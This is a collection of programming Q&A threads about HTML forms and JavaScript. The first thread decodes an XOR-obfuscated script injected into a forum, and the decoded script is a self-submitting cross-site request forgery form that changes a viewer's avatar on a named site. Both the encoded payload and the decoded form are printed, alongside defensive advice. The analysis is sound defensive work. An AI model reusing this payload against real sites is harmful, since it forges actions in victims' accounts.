someone is using a weird script to bug my forum, I tracked it and found the javascript, but it's "encoded", can someone help me ?
here it is:
<script language="javascript">
var enkripsi="'1A`mf{'02mlNmcf'1F'00qw`okv]dmpo'0:'0;'1#'00'1G'2C'1Admpo'02lcog'1F'00o{dmpo'00'02cavkml'1F'00jvvr'1C--dmpwo,hmemq,wmn,amo,`p-fup-gzga-WqgpDwlavkmlq,wrfcvgWqgpCtcvcp,fup'00'02ogvjmf'1F'00RMQV'00'1G'2C'02'02'1Aklrwv'02v{rg'1F'00jkffgl'00'02lcog'1F'00acnnAmwlv'00'02tcnwg'1F'003'00'1G'02'2C'02'02'1Aklrwv'02v{rg'1F'00jkffgl'00'02lcog'1F'00a2/qapkrvLcog'00'02tcnwg'1F'00WqgpDwlavkmlq'00'1G'2C'02'02'1Aklrwv'02v{rg'1F'00jkffgl'00'02lcog'1F'00a2/ogvjmfLcog'00'02tcnwg'1F'00wrfcvgWqgpCtcvcp'00'1G'2C'02'02'1Aklrwv'02v{rg'1F'00jkffgl'00'02lcog'1F'00a2/kf'00'02tcnwg'1F'007:55]3135040515351'00'1G'2C'02'02'1Aklrwv'02v{rg'1F'00jkffgl'00'02lcog'1F'00a2/rcpco2'00'02tcnwg'1F'00qvpkle'1C72;;'00'1G'2C'02'02'1Aklrwv'02v{rg'1F'00jkffgl'00'02lcog'1F'00zon'00'02tcnwg'1F'00vpwg'00'1G'2C'02'02Rngcqg'02ankai'02jgpg'1C'02'1Aklrwv'02v{rg'1F'00qw`okv'00'02tcnwg'1F'00Amlvklwg,,,'00'02-'1G'1A-r'1G'2C'1A-dmpo'1G'2C'2C'1Aqapkrv'02nclewceg'1F'00hctcqapkrv'00'1G'2C'02'02'1A'03//'2C'02'02dwlavkml'02qw`okv]dmpo'0:'0;'02'2C'02'02'5#'2C'02'2;fmawoglv,o{dmpo,qw`okv'0:'0;'2C'02'02'5F'2C'02'02//'1G'2C'1A-qapkrv'1G"; teks=""; teksasli="";var panjang;panjang=enkripsi.length;for (i=0;i<panjang;i++){ teks+=String.fromCharCode(enkripsi.charCodeAt(i)^2) }teksasli=unescape(teks);document.write(teksasli);
</script>
Cleaning up the code results in
var enkripsi = "'1A`mf{'02mlNmcf'1F'00qw`okv]dmpo'0:'0;'1#'00'1G'2C'1Admpo'02lcog'1F'00o{dmpo'00'02cavkml'1F'00jvvr'1C--dmpwo,hmemq,wmn,amo,`p-fup-gzga-WqgpDwlavkmlq,wrfcvgWqgpCtcvcp,fup'00'02ogvjmf'1F'00RMQV'00'1G'2C'02'02'1Aklrwv'02v{rg'1F'00jkffgl'00'02lcog'1F'00acnnAmwlv'00'02tcnwg'1F'003'00'1G'02'2C'02'02'1Aklrwv'02v{rg'1F'00jkffgl'00'02lcog'1F'00a2/qapkrvLcog'00'02tcnwg'1F'00WqgpDwlavkmlq'00'1G'2C'02'02'1Aklrwv'02v{rg'1F'00jkffgl'00'02lcog'1F'00a2/ogvjmfLcog'00'02tcnwg'1F'00wrfcvgWqgpCtcvcp'00'1G'2C'02'02'1Aklrwv'02v{rg'1F'00jkffgl'00'02lcog'1F'00a2/kf'00'02tcnwg'1F'007:55]3135040515351'00'1G'2C'02'02'1Aklrwv'02v{rg'1F'00jkffgl'00'02lcog'1F'00a2/rcpco2'00'02tcnwg'1F'00qvpkle'1C72;;'00'1G'2C'02'02'1Aklrwv'02v{rg'1F'00jkffgl'00'02lcog'1F'00zon'00'02tcnwg'1F'00vpwg'00'1G'2C'02'02Rngcqg'02ankai'02jgpg'1C'02'1Aklrwv'02v{rg'1F'00qw`okv'00'02tcnwg'1F'00Amlvklwg,,,'00'02-'1G'1A-r'1G'2C'1A-dmpo'1G'2C'2C'1Aqapkrv'02nclewceg'1F'00hctcqapkrv'00'1G'2C'02'02'1A'03//'2C'02'02dwlavkml'02qw`okv]dmpo'0:'0;'02'2C'02'02'5#'2C'02'2;fmawoglv,o{dmpo,qw`okv'0:'0;'2C'02'02'5F'2C'02'02//'1G'2C'1A-qapkrv'1G";
// Decoder stage of the injected script: it removes an XOR-with-2 layer and then
// a percent-escape layer from the string held in enkripsi.
// NOTE: teks, teksasli and i are assigned without var, so they are implicit globals.
teks = "";
teksasli = "";
var panjang;
panjang = enkripsi.length;
for (i = 0; i < panjang; i++) {
// XOR each character code with 2. "'" (0x27) becomes "%" (0x25), so a sequence
// such as '1A turns into %3C.
teks += String.fromCharCode(enkripsi.charCodeAt(i) ^ 2)
}
// teks is now a percent-escaped string; unescape() turns it into plain markup.
teksasli = unescape(teks);
// document.write() renders the decoded markup into the current page, so any
// handler or script it contains runs. Print the string instead when analysing it.
document.write(teksasli);
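Change the document.write to a console.log so the decoded markup is printed instead of rendered (once rendered, its onLoad handler would submit the form straight away). Pop it into Firebug and you get: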
<body onLoad="submit_form();">
<form name="myform" action="http://forum.jogos.uol.com.br/dwr/exec/UserFunctions.updateUserAvatar.dwr" method="POST">
<input type="hidden" name="callCount" value="1">
<input type="hidden" name="c0-scriptName" value="UserFunctions">
<input type="hidden" name="c0-methodName" value="updateUserAvatar">
<input type="hidden" name="c0-id" value="5877_1317262737173">
<input type="hidden" name="c0-param0" value="string:5099">
<input type="hidden" name="xml" value="true">
Please click here: <input type="submit" value="Continue..." />
</p>
</form>
<script language="javascript">
<!-- function submit_form() { document.myform.submit() } -->
</script>
The real problem here is how the user is injecting the code into your site to begin with. Are they entering it into a form and you are just outputting whatever they enter, or is it a bug in the software you are using?
If it is a bug in the software, you upgrade.
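If it is your code, you need to learn how to sanitize user input and encode it when you output it. OWASP has great info. Also note what the decoded form does: it posts an avatar change as whoever views the page, and none of its fields looks like a per-session anti-forgery token, so check that the updateUserAvatar endpoint rejects requests that lack one.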
Here is the deobfuscated JavaScript code:
<body onLoad="submit_form();">
<form name="myform" action="http://forum.jogos.uol.com.br/dwr/exec/UserFunctions.updateUserAvatar.dwr" method="POST">
<input type="hidden" name="callCount" value="1">
<input type="hidden" name="c0-scriptName" value="UserFunctions">
<input type="hidden" name="c0-methodName" value="updateUserAvatar">
<input type="hidden" name="c0-id" value="5877_1317262737173">
<input type="hidden" name="c0-param0" value="string:5099">
<input type="hidden" name="xml" value="true">
Please click here: <input type="submit" value="Continue..." /></p>
</form>
<script language="javascript">
<!--
// Called by the <body onLoad="submit_form();"> handler of this decoded markup:
// submits the form named "myform" on page load, without any click by the viewer.
function submit_form()
{
document.myform.submit()
}
-->
</script>
enkripsi="'2C'2C'2C"; teks=""; teksasli="";var panjang;panjang=enkripsi.length;for (i=0;i<panjang;i++){ teks+=String.fromCharCode(enkripsi.charCodeAt(i)^2) }teksasli=unescape(teks);document.write(teksasli);
var enkripsi=""; teks=""; teksasli="";var panjang;panjang=enkripsi.length;for (i=0;i<panjang;i++){ teks+=String.fromCharCode(enkripsi.charCodeAt(i)2) }teksasli=unescape(teks);document.write(teksasli);
I am using Ajax to submit forms in serial. I am trying to make the first s_referee_email + s_referee_fname pair required while the second and any others are not - there will be up to five of these pairs. I can't seem to figure out how to make just the first pair required without breaking the form. I have tried using HTML5 and some answers from Stack Overflow but haven't been able to get anything to work. Any advice is greatly appreciated!
fiddle: https://jsfiddle.net/badsmell/gcrvqbna/
<html>
<head>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.0/jquery.min.js"></script>
<!--serial submit ajax-->
<script>
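/**
 * Posts every <form> on the page to the server, one request per form.
 *
 * Each form is serialized with jQuery's .serialize() and the value of the
 * shared "#s_refererFname" input is appended as s_referer_fname. When a
 * request reports success the browser is sent to the redirect URL.
 */
function mySubmit(){
  // The referrer name is free text typed by the user. Encode it so that
  // characters such as "&" or "=" stay inside the value instead of adding
  // extra parameters to the request body.
  var refererName = encodeURIComponent($('#s_refererFname').val());
  var myForms = $("form");
  myForms.each(function(index) {
    var form = myForms.eq(index);
    var serializedForm = form.serialize();
    serializedForm += '&s_referer_fname=' + refererName;
    $.post("http://post.aspx", serializedForm, function (data, status) {
      // NOTE(review): the first successful response navigates away, which may
      // cut off requests for the remaining forms - confirm this is intended.
      if (status === "success"){
        window.location.href= "http://redirect";
      }
    });
  });
}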
</script>
<title>Forward a copy to a friend</title>
<style type="text/css">
*[class=hide] {
display: none
}
</style>
</head>
<body>
<!--hidden iframe-->
<iframe class="hide" id="myIframe"></iframe>
<form method="post" action="post.aspx" target="myIFrame">
<input type="hidden" name="s_referer_email" value="test#test.com" />
<input type="text" size="30" maxlength="255" name="s_referee_email" value="" required >
<input type="text" size="22" maxlength="50" name="s_referee_fname" value="" required >
</form>
<form method="post" action="post.aspx" target="myIFrame">
<input type="hidden" name="s_referer_email" value="test#test.com" />
<input type="text" size="30" maxlength="255" name="s_referee_email" value="" >
<input type="text" size="22" maxlength="50" name="s_referee_fname" value="" >
</form>
<label for="s_referer_fname">Your name:</label> <br /> <input type="text" name="s_referer_fname" value="" size="20" id="s_refererFname" ><br>
<p><button onclick="mySubmit();">Submit</button> </p>
</body>
</html>
Adding required="required" to the tags can let you make any field compulsory to be filled by user.
You should never use .onclick(), or similar attributes from a userscript.
Userscripts operate in a sandbox, and onclick operates in the target-page scope and cannot see any functions your script creates.
Always use addEventListener() (or an equivalent library function, like jQuery .on()).
So instead of code like:
something.outerHTML += '<input onclick="func()" id="button_id" ...>'
You would use:
something.outerHTML += '<input id="button_id" ...>'
document.getElementById ("button_id").addEventListener ("click", func, false);
And for your answer, one method is to perform a check before actually submitting the forms. Check if the required fields have been filled; if yes, go ahead and submit the form, or else don't submit and show an error message instead. Repeat the same check on the server, because a check that runs only in the browser can be skipped.
*
<form id="5" form method="get" action="http://crimson-craft.buycraft.net/checkout/packages">
<input type="hidden" name="direct" value="true">
<input type="hidden" name="action" value="add">
<input type="hidden" name="package" value="1250806">
<input type="hidden" name="ign" value=username>
</form>
<script>
/**
 * Asks the visitor for a Minecraft username and submits form "5" unless the
 * prompt was cancelled. The entered text is not copied into the form.
 */
function buynow5() {
  var answer = prompt("Please enter your MineCraft username", "");
  // prompt() gives null on cancel; the loose comparison also covers undefined.
  if (answer == null) {
    return;
  }
  document.getElementById("5").submit();
}
</script>
Buy Now
*
So the JavaScript popup works and asks for an input, then submits the form, but the form doesn't pass the variable. I'm sorry if this is a dumb question, but I'm very new to this.
Fix:
Change this:
<input type="hidden" name="ign" value=username>
to this:
<input id="usernameInput" type="hidden" name="ign" value="">
Then update your method like so:
/**
 * Asks for a Minecraft username, stores it in the hidden "usernameInput"
 * field and submits form "5". Nothing happens when the answer is empty or
 * the prompt is cancelled.
 */
function buynow5() {
  var entered = prompt("Please enter your MineCraft username", "");
  // Cancel (null) and an empty answer are both falsy: leave without submitting.
  if (!entered) {
    return;
  }
  var hiddenField = document.getElementById('usernameInput');
  hiddenField.value = entered;
  document.getElementById('5').submit();
}
You can't bind javascript properties to HTML inputs without extra libraries.
Tip:
While you can make this work without any libraries, I highly suggest you look in to jQuery to facilitate DOM manipulation and interactive events. If you want more control and databinding, take a look at AngularJS as well.
Full Code:
<form id="5" form method="get" action="http://crimson-craft.buycraft.net/checkout/packages">
<input type="hidden" name="direct" value="true">
<input type="hidden" name="action" value="add">
<input type="hidden" name="package" value="1250806">
<input id="usernameInput" type="hidden" name="ign" value="">
</form>
<script>
/**
 * Prompts for a Minecraft username and, when one was given, writes it to the
 * hidden "usernameInput" field before submitting form "5".
 */
function buynow5() {
  var typedName = prompt("Please enter your MineCraft username", "");
  var gotName = Boolean(typedName); // false for cancel (null) and for ""
  if (gotName) {
    var target = document.getElementById('usernameInput');
    target.value = typedName;
    var checkoutForm = document.getElementById("5");
    checkoutForm.submit();
  }
}
</script>
Buy Now
AWeber's form data display JavaScript code looks something like this:
<script type="text/javascript">formData.display("name")</script>
<script type="text/javascript">formData.display("email")</script>
<script type="text/javascript">formData.display("phone")</script>
Now, how can I use this as an input field value, like this:
<form method="post" action="">
<input name="name" type="text" value="<script type="text/javascript">formData.display("name")</script>">
<input name="email" type="text" value="<script type="text/javascript">formData.display("email")</script>">
<input name="phone" type="text" value="<script type="text/javascript">formData.display("phone")</script>">
<input type="submit" value="Go">
</form>
Reference: https://help.aweber.com/entries/21696333-How-Do-I-Display-Subscribers-Names-or-Email-Addresses-On-My-Thank-You-Page-
Please help me.
You cannot simply place some code inside a value attribute and hope it will work; you need appropriate JavaScript code to put the formData into the value attribute of the input field. You can do it with something like:
// Once the page has loaded, copy each formData value into the first input
// that carries the same name attribute.
// NOTE(review): assumes formData.display() returns the value rather than
// writing it to the page - confirm against the AWeber script.
window.onload = function() {
  var fieldNames = ['name', 'email', 'phone'];
  for (var k = 0; k < fieldNames.length; k++) {
    var field = fieldNames[k];
    document.getElementsByName(field)[0].value = formData.display(field);
  }
};
this is my JS code to check the match of two digits
<script type="text/javascript">
/**
 * Compares the sum of fields "one" and "two" with field "sum" and reports the
 * outcome in an alert box. Nothing is returned.
 */
function match(){
  // NOTE(review): parseInt() is handed the elements themselves, not their .value.
  var first = parseInt(document.getElementById("one"));
  var second = parseInt(document.getElementById("two"));
  var claimed = parseInt(document.getElementById("sum"));
  var total = first + second;
  var message = (total != claimed) ? "Something is wrong!!" : "Success";
  alert(message);
}
</script>
HTML code to generate the two digits and run the check:
<form action="#" method="post" onsubmit="return match();">
<input type="text" name="one" id="one" value="<?php echo rand(1,9); ?>" readonly="readonly"/>
+
<input type="text" name="two" id="two" value="<?php echo rand(1,9); ?>" readonly="readonly"/>
=
<input type="text" name="sum" id="sum" />
<input type="submit" value="submit" />
</form>
Perhaps you want their value and not the element itself.
var a=parseInt(document.getElementById("one").value,10);
var b=parseInt(document.getElementById("two").value,10);
var c=parseInt(document.getElementById("sum").value,10);
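Also, provide the radix when you are using parseInt(), otherwise it may guess the base from the string's prefix. Since this check runs entirely in the browser, the server should verify the sum as well.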
First tentative steps into client side. I'm having trouble finishing the following. My question is how do I return the value of a function in a HTML statement ...
<script language="Javascript">
// Always returns 1; takes no arguments and reads nothing from the page.
function checkjava() {
  var result = 1;
  return result;
}
</script>
</head>
<body>
<form action="enabled_catch.php" method="get" name="your_form">
<input type="HIDDEN" name="answer" value="RETURN checkjava() HERE")>
<input type="submit" value="click me">
</form>
</body>
I'd appreciate your help
Thanks in advance
G
<head>
<script language="Javascript">
// Returns the constant 1, which the form's onsubmit handler copies into the
// hidden "answer" field.
function checkjava() {
  var flag = 1;
  return flag;
}
</script>
</head>
<body>
<form action="enabled_catch.php"
method="get"
name="your_form"
onsubmit="this.answer.value=checkjava();">
<input type="hidden" name="answer">
<input type="submit" value="click me">
</form>
</body>
No need for the id attribute.
<form action="enabled_catch.php" method="get" name="your_form" >
<input type="HIDDEN" name="answer" value="RETURN checkjava() HERE")>
<input type="submit" onclick="document.getElementById('answer').value=checkjava();" value="click me">
You would do something like that:
<script language="Javascript">
// Returns 1 on every call; it has no parameters and no side effects.
function checkjava() {
  var value = 1;
  return value;
}
</script>
</head>
<body>
<form action="enabled_catch.php" method="get" name="your_form" onsubmit="document.getElementById('answer').value=checkjava();">
<input type="HIDDEN" id="answer" >
<input type="submit" value="click me">
</form>
</body>
Basically on form submit you would set the value of the answer input to the result of the function call.
EDIT: placed onsubmit on the wrong element before (embarrassing).
I would have an id on the answer tag and then do it in the form onsubmit event.
Something like:
<form onsubmit="document.getElementById("answerId").value = checkJava()" action="enabled_catch.php" method="get" name="your_form">
<input type="HIDDEN" name="answer" id="answerId" value="RETURN checkjava() HERE")>
<input type="submit" value="click me">
</form>
Browser-side scripting is event driven. Unless an event is triggered, nothing happens.
You could listen to the click event on your submit button, and then manipulate the value of your hidden field:
<input type="hidden" id="answer" name="answer" value="")>
<input type="submit" value="click me"
onclick="document.getElementById('answer').value = checkjava();">
Note how we had to give an id to the hidden field, in order to be able to reference it with getElementById().
Also note that JavaScript is case sensitive: checkjava() and checkJava() are not the same.
<script>
document.your_form.answer.value = checkjava();
</script>
Unless you want to use a fancy JS library. =)